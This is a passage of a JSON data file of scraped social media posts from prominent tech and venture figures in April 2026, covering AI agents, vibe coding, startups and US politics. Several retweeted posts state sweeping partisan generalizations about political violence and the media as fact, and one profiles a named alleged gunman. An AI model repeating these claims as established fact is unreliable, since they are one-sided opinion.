balance performance, cost, and governance without locking yourself into one lane.", + "url": "https://nitter.net/Ronald_vanLoon/status/2048749084446515253#m", + "published_at": "2026-04-27T13:00:20+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "R to @Ronald_vanLoon: My biggest takeaway:\n\nModels are becoming components, not products.\n\nWhat matters now is the system around them:\n\n→ runtimes\n→ memory\n→ tool access\n→ orchestration\n→ secure execution environments\n\nThat is what turns a model into an agent, and an agent into something the business can actually deploy across functions.", + "url": "https://nitter.net/Ronald_vanLoon/status/2048749081464287511#m", + "published_at": "2026-04-27T13:00:19+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Most enterprise AI strategies are already behind.\n\nNot because they picked the wrong model, but because they are still thinking at the model layer.\n\nThe real shift is happening one level up, where AI becomes a system that can reason, use tools, retain context, and execute work inside secure environments.\n\nThat changes enterprise strategy faster than most leaders realize.\n\nA thread, with insights from my latest video with NVIDIA…\n\n#NVIDIAPartner #NVIDIAGTC", + "url": "https://nitter.net/Ronald_vanLoon/status/2048749077911736401#m", + "published_at": "2026-04-27T13:00:18+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Shape-Shifting Wheels by KIMM Let Wheelchairs Climb Stairs and Conquer Any Terrain\nby @spaceandtech_\n\n#Innovation #EmergingTech #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2048746516324487529#m", + "published_at": "2026-04-27T12:50:08+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "R to @GaryMarcus: Stop blaming the users. It’s not that simple:", + "url": "https://nitter.net/GaryMarcus/status/2048746152749846549#m", + "published_at": "2026-04-27T12:48:41+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "People keep blaming the users for the growing number of vibe-coded reasoners. Doing so is *half* right.\n\nUsers *are*screwing up - by letting vibe coded stuff access their files, without proper backups, without proper monitoring, without adequate sysadmin, etc.\n\nBut that’s *exactly why* we still need software engineers — and why what Dario recently said about software engineers disappearing is so absurd.\n\nSkilled coders can use vibe-coded tools, with careful oversight.\n\nBut amateurs using vibe-coding tools are asking for trouble. \n\nUsing them without a strong prior working knowledge in coding and sysadmin *is* the mistake.", + "url": "https://nitter.net/GaryMarcus/status/2048742983684784239#m", + "published_at": "2026-04-27T12:36:05+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "“Vibe coded disasters piling up on Reddit”", + "url": "https://nitter.net/GaryMarcus/status/2048739005525877072#m", + "published_at": "2026-04-27T12:20:17+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.", + "url": "https://nitter.net/paulg/status/2048704073356935676#m", + "published_at": "2026-04-27T10:01:28+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "You never need to describe something as a \"bad take.\" If it's false or irrelevant or omits something important, you can just say so. And if it's true, relevant, and complete, it's not a bad take.", + "url": "https://nitter.net/paulg/status/2048701354672050286#m", + "published_at": "2026-04-27T09:50:40+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.", + "url": "https://nitter.net/paulg/status/2048677984106664227#m", + "published_at": "2026-04-27T08:17:48+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Whenever I go to Paris to talk about investing in YC startups, I'm always amazed how much the French just LOVE Y Combinator. Nous t'aimons aussi, France.\n\nMy French friend of @Fundoraclub wanted to see YC from the inside...and share it with the people of France. This is the result: a 90 minute insiders documentary. \n\nI don't work for Y Combinator itself, but I'll give you the experience I've had as a founder, alumni, investor etc. He showed up in March with cameras, videographers, newscasters, youtubers. He brought half the French tech press. \n\nWe spent 4 full days visiting YC founder offices and hacker houses. Going to pre-demo day practice sessions. Late night bar hopping with YC founders. Interviews with YC partners. \n\nIt was real. It was unfiltered. And it was inspiring.\n\nI went to Paris last week with my daughter Callie to watch it in a packed movie theater. This crowd of 500+ French investors got inspired about investing into YC startups. After watching this movie, they understand what I wish everyone understood: YC founders are incredibly capable and resilient builders that want to solve problems and YC helps them become formidable founders. It's impossible to not be inspired by them.\n\nAlan and Bradley Lafond just released the movie on Youtube (link below). Enjoy it! J'espère que vous l'apprécierez!\n\nA big thank you to @dessaigne, @garrytan, Victoria Holst and everyone at YC for helping us. This wasn't an official YC event (our fund and Fundora are not a part of YC to be clear). But they were so welcoming and generous!\n\nIt's an honor to share with France (and now with y'all) the experience I've gotten from YC. Our fund Orange Collective exists to help spread the YC love. If you were thinking of joining us as an investor for Fund I, contact me now before the final close on June 1st. If you're in France, contact Fundora. \n\nAnd big thank you to @nico_laqua, @qhoang09, @gregpr07, @mamagnus00, @smthomas3, @abhiaiyer, @marieschneegans, Veiga Management, Fundora and all the YC founders that hosted us!", + "url": "https://nitter.net/jasonfreedman/status/2048615296613937201#m", + "published_at": "2026-04-27T04:08:42+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: The greatest con of the decade was calling autocomplete “AI”. \n\nThe second greatest is calling autocomplete-in-a-loop an “agent”.", + "url": "https://nitter.net/atmoio/status/2048608025464705084#m", + "published_at": "2026-04-27T03:39:49+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Grok Imagine", + "url": "https://nitter.net/elonmusk/status/2048600964102246438#m", + "published_at": "2026-04-27T03:11:45+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "“Always keep a separate backup.” For sure, every experienced programmer should know this.\n\n𝘉𝘶𝘵 𝘸𝘦 𝘫𝘶𝘴𝘵 𝘤𝘳𝘦𝘢𝘵𝘦𝘥 𝘢 𝘸𝘩𝘰𝘭𝘦 𝘨𝘦𝘯𝘦𝘳𝘢𝘵𝘪𝘰𝘯 𝘰𝘧 𝘷𝘪𝘣𝘦 𝘤𝘰𝘥𝘦𝘳𝘴 𝘸𝘩𝘰 𝘥𝘰𝘯’𝘵.\n\nAnd we now have a legion of synthetic coding agents (like Cursor) that also apparently don’t always follow this basic principle, either.\n\n𝗪𝗵𝗶𝗰𝗵 𝗶𝘀 *𝗲𝘅𝗮𝗰𝘁𝗹𝘆* 𝘄𝗵𝘆 𝘄𝗲 𝘀𝗵𝗼𝘂𝗹𝗱 𝗻𝗼𝘁 𝘁𝗿𝘂𝘀𝘁 𝗰𝗼𝗱𝗶𝗻𝗴 𝗮𝗴𝗲𝗻𝘁𝘀.", + "url": "https://nitter.net/GaryMarcus/status/2048593283639894520#m", + "published_at": "2026-04-27T02:41:14+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Curiosity & adventure are my philosophy\n\nhttps://grok.com/share/bGVnYWN5_d70e0164-cced-4096-99cb-38604067aa7a", + "url": "https://nitter.net/elonmusk/status/2048589691054694406#m", + "published_at": "2026-04-27T02:26:57+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: “fails less often than a human does” is a terrible metric. \n \nWe build deterministic software and test it to destruction to ensure it’s 99.99999 reliable . That’s been the basis of every critical application such as accounting payroll and logistics. \n\nLLMs can’t get even close.", + "url": "https://nitter.net/SteveStricklan6/status/2048589239915577837#m", + "published_at": "2026-04-27T02:25:10+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: the beauty of a jagged frontier\nis that every failure is the user's fault\nand every breakthrough is the model's glory", + "url": "https://nitter.net/suchenzang/status/2048582672163995766#m", + "published_at": "2026-04-27T01:59:04+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Incredible writing from @euphoriaHBO", + "url": "https://nitter.net/Jason/status/2048580651985604783#m", + "published_at": "2026-04-27T01:51:02+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: I mean AI influencers here and everywhere are screaming you shouldn't get hired if you don't use agentic AI because you're deliberatly slowing everyone down and the moment something goes wrong it's your fault because you didn't understand the tool?", + "url": "https://nitter.net/BlackHackOfDoom/status/2048580122521780676#m", + "published_at": "2026-04-27T01:48:56+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "so fun to see the reception to 5.5!\n\nthere is almost nothing that feels more gratifying to me than builders saying they find our tools useful.", + "url": "https://nitter.net/sama/status/2048554097985593849#m", + "published_at": "2026-04-27T00:05:31+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "Our Principles:\n\nDemocratization, Empowerment, Universal Prosperity, Resilience, and Adaptability\n\nhttps://openai.com/index/our-principles/", + "url": "https://nitter.net/sama/status/2048552677433643427#m", + "published_at": "2026-04-26T23:59:53+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Remember this", + "url": "https://nitter.net/elonmusk/status/2048543344746250466#m", + "published_at": "2026-04-26T23:22:48+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Grad school indoctrination camps", + "url": "https://nitter.net/elonmusk/status/2048535299102265720#m", + "published_at": "2026-04-26T22:50:49+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "We hired someone for the investing team. \n\nSomething I never planned to do. \n\nThey sent the team 3 new deals per day for 90 days straight. \n\nAll aligned to our stage, geography and deal type. \n\nThat’s how you hustle and get a job in VC. \n\nStay tuned. Reveal to come.", + "url": "https://nitter.net/HarryStebbings/status/2048531257399664920#m", + "published_at": "2026-04-26T22:34:46+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: 🚨BREAKING: I found Cole Allen's archived tweets.\n\nHe predicted \"Kamala wins all swing states,\" compared Trump's win to “Nazis getting elected,” and moved to Bluesky.\n\nThe scary part: he retweeted every mainstream Democrat on this platform.\n\nThread below. 👇\n\nWhat radicalized him were the same talking points repeated every day on the left.", + "url": "https://nitter.net/KanekoaTheGreat/status/2048512831692452091#m", + "published_at": "2026-04-26T21:21:33+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.", + "url": "https://nitter.net/DavidSacks/status/2048502978626113625#m", + "published_at": "2026-04-26T20:42:24+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "I’ve invested in 700 private companies \n\nProviding liquidity and loans to high performing founders is completely standard. \n\nIn fact, investors encourage loans and secondary sales for founders to enable them to go for the Gold — which is exactly what SpaceX has done. \n\nThe @NYTimesPR is presenting this as a controversy, when in fact it’s the private company playbook in 2026. \n\nAnother hit job from the NYT", + "url": "https://nitter.net/Jason/status/2048487905543237675#m", + "published_at": "2026-04-26T19:42:30+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I have interviewed 1,000 of the best CEOs of the last 10 years. \n\nAdam Foroughi, Founder @AppLovin is easily top 3, ever. \n\n$160BN Market Cap \n\n$5.48BN Revenue\n\n$10M EBITDA per head \n\n82%+ margins\n\nJust 450 people in core business 🤯 \n\nNo other business on the planet has numbers like this. \n\nEpisode tomorrow 👇", + "url": "https://nitter.net/HarryStebbings/status/2048486182904852537#m", + "published_at": "2026-04-26T19:35:39+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs, lower unemployment, higher GDP in Democratic administrations than every GOP administration in the last 3 decades. Without fail.", + "url": "https://nitter.net/briantylercohen/status/2048469956627468510#m", + "published_at": "2026-04-26T18:31:11+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Ok @Acosta, balls in your court", + "url": "https://nitter.net/Jason/status/2048465651723882972#m", + "published_at": "2026-04-26T18:14:04+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "The NYTimes focus last week was micro-looting, social murder and meaningless private company transactions designed to ferment class warfare.\n\nDisgraziad", + "url": "https://nitter.net/Jason/status/2048463405590225173#m", + "published_at": "2026-04-26T18:05:09+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Accurate", + "url": "https://nitter.net/elonmusk/status/2048456433981591867#m", + "published_at": "2026-04-26T17:37:26+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Accurate", + "url": "https://nitter.net/elonmusk/status/2048456433981591867#m", + "published_at": "2026-04-26T17:37:26+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Falcon 9 launches 25 @Starlink satellites from California", + "url": "https://nitter.net/SpaceX/status/2048453949381091634#m", + "published_at": "2026-04-26T17:27:34+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950.\n\nThe National Science Board is the independent body that oversees the National Science Foundation, the agency that distributes $9 billion in research grants every year. \n\nIts members are scientists and engineers from universities and industry. They serve six-year staggered terms specifically so they cross presidential administrations and stay independent of whoever is in power.\n\nOn Friday, every single one of them got the same boilerplate email from Mary Sprowls of the Presidential Personnel Office: \"On behalf of President Donald J Trump, I am writing to inform you that your position as a member of the National Science Board is terminated, effective immediately. Thank you for your service.\"\n\nThat's it. That's the whole letter. For 76 years of institutional independence.\n\nThe NSF funds the basic science behind MRIs. Cellphones. LASIK eye surgery. GPS. The internet itself. The Antarctic research stations. The deep-space telescopes. The research vessels mapping the ocean floor. Every breakthrough that made America the world's leader in science for the better part of a century traces back through grants this agency made and this board approved.\n\nThe board chair, Victor McCrary, was actively advising Congress on Trump's proposed 55% cut to NSF's budget. The board was helping fight back. So Trump fired the board.\n\nMarvi Matos Rodriguez, one of the fired members, told reporters she had been reviewing an 80-page report as part of her board duties just days before being terminated. \n\nKeivan Stassun, a physicist at Vanderbilt, said NSF's leadership had already stopped responding to board oversight requests months ago. \"We would ask them, 'Are you following board governance directives?' And their answer would be, in effect, 'We don't listen to you anymore.'\"\n\nNow there's no board to answer to.\n\nRep. Zoe Lofgren of California, the top Democrat on the House Science Committee, called it \"the latest stupid move made by a president who continues to harm science and American innovation. Will the president fill the NSB with MAGA loyalists who won't stand up to him as he hands over our leadership in science to our adversaries?\"\n\nThat's the actual question. \n\nBecause while Trump is firing American scientists, China is building research universities at a rate we cannot match. The CDC just buried a study showing vaccines work.\n\n RFK Jr. runs HHS. The EPA is gutted. The Forest Service is being broken. Half of American children are breathing dangerous air. And now the people who decide what gets researched in the United States have all been fired by email on a Friday afternoon.", + "url": "https://nitter.net/Gianl1974/status/2048453901930660058#m", + "published_at": "2026-04-26T17:27:23+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Who made this?!", + "url": "https://nitter.net/Jason/status/2048450286902235560#m", + "published_at": "2026-04-26T17:13:01+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: In shocking news, calling your political opponents Nazis makes crazy people want to kill them. Who could have predicted this?", + "url": "https://nitter.net/KonstantinKisin/status/2048448438715445382#m", + "published_at": "2026-04-26T17:05:40+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "I’m proud to announce I’m hosting an exhibition cage match between @Acosta and @mtracey on July 4th \n\n$100,000 cash prize \n\nVegas \n\n3, 3 minute rounds", + "url": "https://nitter.net/Jason/status/2048437340218044499#m", + "published_at": "2026-04-26T16:21:34+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Once again, the substack party result in a Donnybrook — it’s like the source awards for wordmaxxers", + "url": "https://nitter.net/Jason/status/2048436081725464959#m", + "published_at": "2026-04-26T16:16:34+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: 25% of very liberal people say political violence can “sometimes be justified.”\n\nAmong very conservative people it’s just 3%.\n\nIn other words, the far left is 8x more likely to support political violence as the far right.\n\nStop pretending this is a “both sides” problem. It’s not.", + "url": "https://nitter.net/RobertMSterling/status/2048435593244237849#m", + "published_at": "2026-04-26T16:14:38+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. \n\nPoliticians never waste a good fake crisis, which is why they're perfect for Bernie to try to seize the means of production back from the private sphere.\n\nImagine if a mainstream politician put the Heaven's Gate suicide cult on the platform in 1997?\n\nThat's where we are in American politics at the edges today. \n\nWe've jumped the shark into the absurd and we've completely lost the thread of reality in America today.\n\nAnd it isn't AI that caused this madness. It is good old fashioned human hallucination, story telling and delusion.\n\nSociety should never make policy about imaginary future threats that have no actual basis in reality. AI is already used by billions and it is nothing like what people imagined it to be and we're all still here and the problems have been ridiculously minimal even by the standards of past tech revolutions.\n\nIf I told you there was a technology where 1.5 million people would die every year and injure 50 million would you sign up for that tech? The answer is yes because it's cars. You probably got in one today and accepted that risk and never even thought about it.\n\nIn contrast, the amount of people who died or were injured by AI is a tiny fraction of a percent and even those cases are probably specious at best.\n\nIn fact, AI has actually saved countless lives. It's saved lives through drug discovery by helping create the COVID and flu vaccines. It's saved lives through anti-lock breaks. It's saved lives with self driving cars that are 10X safer than human drivers and yet the only thing you read about self driving cars in the news are the incredibly rare stories of the very few times it did actually kill a dog or injure someone.\n\nIf that sounds irrational and insane that's because it is.\n\nWe're worried about a technology with a nearly perfect track record of safety and are totally fine with a technology that kills people every day?\n\nWelcome to the irrationality of the human mind!\n\nIf the pause AI cult had their way we'd still be stuck on GPT2 which was a hallucinating mess and we'd have made no progress to the much more sound and highly aligned and intelligent and useful models we have now.\n\nThat's because you can't make progress by imagining it in your mind or writing idiotic essays on Less Wrong to other mental masturbators. \n\nYou solve problems in the real world through trial and error. \n\nThe way to make AI safe is by building it and iterating in the real world. \n\nThere is no other way.", + "url": "https://nitter.net/Dan_Jeffries1/status/2048432684930654430#m", + "published_at": "2026-04-26T16:03:04+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "feels like a good time to seriously rethink how operating systems and user interfaces are designed\n\n(also the internet; there should be a protocol that is equally usable by people and agents)", + "url": "https://nitter.net/sama/status/2048428561481265539#m", + "published_at": "2026-04-26T15:46:41+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "\"post-AGI, no one is going to work and the economy is going to collapse\"\n\n\"i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stretches and miss out on working\"", + "url": "https://nitter.net/sama/status/2048426122854228141#m", + "published_at": "2026-04-26T15:37:00+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Seeing two types of founders emerge in this moment:\n\nThe tourists and the terminators. \n\nThe terminators are salivating at the opportunity ahead. Hungrier than ever. More ambitious than ever. They want it more than ever. \n\nThe tourists. They want to sell. They are scared. They do not want to commit 10 years to such uncertainty. \n\nPack is separating.", + "url": "https://nitter.net/HarryStebbings/status/2048418806867870115#m", + "published_at": "2026-04-26T15:07:55+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by the handle http://ColdForce.bsky.social with multiple references violence and guns.\n\nIn one post he calls President Trump the Antichrist.\n\nIn another he recommends buying guns in reaction to Trump’s DOJ exploring ways to ban firearm purchases from transgenders.\n\nIn one post he calls Trump a sociopathic mob boss and in another referred to him as a traitor with known connections to Putin, repeating a favorite leftwing Russian Hoax talking point.\n\nHe also attacks JD Vance for advocating an end to America’s funding the war in Ukraine and for his criticisms of the Pope. He seems pretty fixated on Ukraine more generally.\n\nHe also frequently interacts with Will Stancil’s Bluesky account, among others.", + "url": "https://nitter.net/AndrewKolvet/status/2048417712439689346#m", + "published_at": "2026-04-26T15:03:35+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Yeah okay, Lego bros, brodettes and brotheys are cooked with this one.\n\nGPT 2 Image can create full Lego sets! With actual Bricklink IDs so you can order the parts and build it.\n\nWhole new business opportunity here for the taking.", + "url": "https://nitter.net/DennisonBertram/status/2048413815675539816#m", + "published_at": "2026-04-26T14:48:06+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Every post, I block and report a couple accounts using AI-generated replies. It feels much the same as picking up litter on a city street; I don't know if it has any effect, but it feels like I ought to at least try to keep the site clean.", + "url": "https://nitter.net/paulg/status/2048413578789634100#m", + "published_at": "2026-04-26T14:47:09+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Durer was the original Dr Seuss.", + "url": "https://nitter.net/paulg/status/2048411898081583547#m", + "published_at": "2026-04-26T14:40:28+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Writing a talk to give in Stockholm. The prospect of speaking to a large group of people is no longer frightening, but writing a talk is as much work as ever. I'm no longer afraid of audiences, but I'm still just as afraid of making mistakes.", + "url": "https://nitter.net/paulg/status/2048411021329453562#m", + "published_at": "2026-04-26T14:36:59+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "The best founders I know all text their investors. \n\nNone of them email them. \n\nThe relationship will blossom and deepen in a matter of messages.", + "url": "https://nitter.net/HarryStebbings/status/2048400836024283246#m", + "published_at": "2026-04-26T13:56:31+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: Random pic of @Jason protecting our $TAO bags", + "url": "https://nitter.net/nordin_eth/status/2048399674269213067#m", + "published_at": "2026-04-26T13:51:54+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "Shooting oneself in the foot?\nNope.\nShooting oneself in the prefrontal cortex.", + "url": "https://nitter.net/ylecun/status/2048399621492236615#m", + "published_at": "2026-04-26T13:51:41+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: 'Action is now needed': Over 60 ex-U.K. ambassadors call to sanction Israel over West Bank\nhttps://www.haaretz.com/west-bank/2026-04-26/ty-article/.premium/over-60-ex-uk-ambassadors-call-to-sanction-israel-over-west-bank/0000019d-c950-d11b-a7df-ef5a5fba0000", + "url": "https://nitter.net/haaretzcom/status/2048396013816152216#m", + "published_at": "2026-04-26T13:37:21+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: How do you think the left redistributes wealth?\n\nViolence\n\nHow do you think the left seizes the means of production?\n\nViolence\n\nHow do you think they censor and surveil opponents?\n\nViolence\n\nWhat do you think the left means by “the struggle”?\n\nViolence", + "url": "https://nitter.net/TheAliceSmith/status/2048390094529216982#m", + "published_at": "2026-04-26T13:13:50+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯\n\nSabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!!\n\nHe makes history as the first man to officially break 2 hours in the marathon.\n\nYomif Kejelcha 🇪🇹 in his debut ran 1:59:41 to become 2nd fastest alltime, while Jacob Kiplimo 🇺🇬 finished in 2:00:28.\n\nAll under the previous World Record.", + "url": "https://nitter.net/TrackGazette/status/2048351736037826877#m", + "published_at": "2026-04-26T10:41:25+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories.\n\nIf you're on either side of this slider, congratulations, you may be a child in an adult costume body!\n\nBlack and white thinking is for children. \n\nWhen you become an adult it's time to put away childish things.", + "url": "https://nitter.net/Dan_Jeffries1/status/2048293118781296734#m", + "published_at": "2026-04-26T06:48:29+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "The left has a serious violence problem, which @DavidSacks called out early and often. \n\nThis generation of woke democratic socialists are morally bankrupt. \n\nThey believe in looting and violence as a political tool — and they’re vocal about it. \n\nIf you called out the violent members of the January 6th riots, you also have to call out the radical left. \n\n#ballsandstrikes https://x.com/EndWokeness/status/2048217117221065201/video/1", + "url": "https://nitter.net/Jason/status/2048249992163242220#m", + "published_at": "2026-04-26T03:57:07+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "If you’re not condemning these lunatics, you’re advocating for the end of the American empire. \n\nI’m not for canceling people, but the fact the @nytimes and @newyorker not only employees these individuals, but selects them to represent their brands, shows exactly how bankrupt they are.", + "url": "https://nitter.net/Jason/status/2048247267182658004#m", + "published_at": "2026-04-26T03:46:17+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Saturday song\n\nhttps://youtu.be/D8MoLNxLE98?si=yRsm9viuy3NYvnJ0", + "url": "https://nitter.net/eladgil/status/2048230781739581745#m", + "published_at": "2026-04-26T02:40:47+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: That's exactly my view too, roughly compresses 2 weeks of our previous jobs to 1 day", + "url": "https://nitter.net/SebastienBubeck/status/2048224374264885396#m", + "published_at": "2026-04-26T02:15:19+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "how can they write code so fast?!", + "url": "https://nitter.net/sama/status/2048165186482389253#m", + "published_at": "2026-04-25T22:20:08+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: (and we will fix the former)", + "url": "https://nitter.net/sama/status/2048160448340767038#m", + "published_at": "2026-04-25T22:01:18+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we still get looksmaxxed on frontend a little but we IQmog hard now", + "url": "https://nitter.net/sama/status/2048160404376105179#m", + "published_at": "2026-04-25T22:01:08+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: OPINION: \"Trump’s mismanagement has resulted in death, destruction, wasted tax dollars, and a huge loss in respect for the United States — all to accomplish nothing.\" https://ebx.sh/V5TJjQ", + "url": "https://nitter.net/PhillyInquirer/status/2048118689258487857#m", + "published_at": "2026-04-25T19:15:22+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to make sure that all of our industries do well. Crypto's a big industry.\"", + "url": "https://nitter.net/RapidResponse47/status/2048111588930986354#m", + "published_at": "2026-04-25T18:47:09+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: When MTV News shut down, it felt like decades of culture vanished overnight 🕳️\n\nBut over 470,000 pages were already preserved.\n\nThat history didn’t disappear.\nIt was archived.\n\n📚 Read VANISHING CULTURE to see why it matters\n📖 Download & read: https://archive.org/details/vanishing-culture-2026\n🛒 Purchase in print: https://www.betterworldbooks.com/product/detail/vanishing-culture-a-report-on-our-fragile-cultural-record-9798995425014/new\n\n#VanishingCulture #DigitalMemory #InternetArchive #MTVNews #BookTwitter", + "url": "https://nitter.net/internetarchive/status/2048069805807128734#m", + "published_at": "2026-04-25T16:01:07+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Another big reason why I don’t necessarily agree with changing the base designs, I think they’re perfect for a medium budget kids cartoon, Qwel’s new art style making them look more marshmallowy and cuddly proves that imo", + "url": "https://nitter.net/images_i_love3/status/2048061157685010444#m", + "published_at": "2026-04-25T15:26:45+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Journalists worldwide should stand up for colleagues who are murdered.", + "url": "https://nitter.net/NickKristof/status/2048043843690561556#m", + "published_at": "2026-04-25T14:17:57+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI\n\nFrom David Sacks\n\n\"Historically we only had two good exits for software businesses. One was IPO. The other was M&A. Then these big private equity shops came along and gave us a 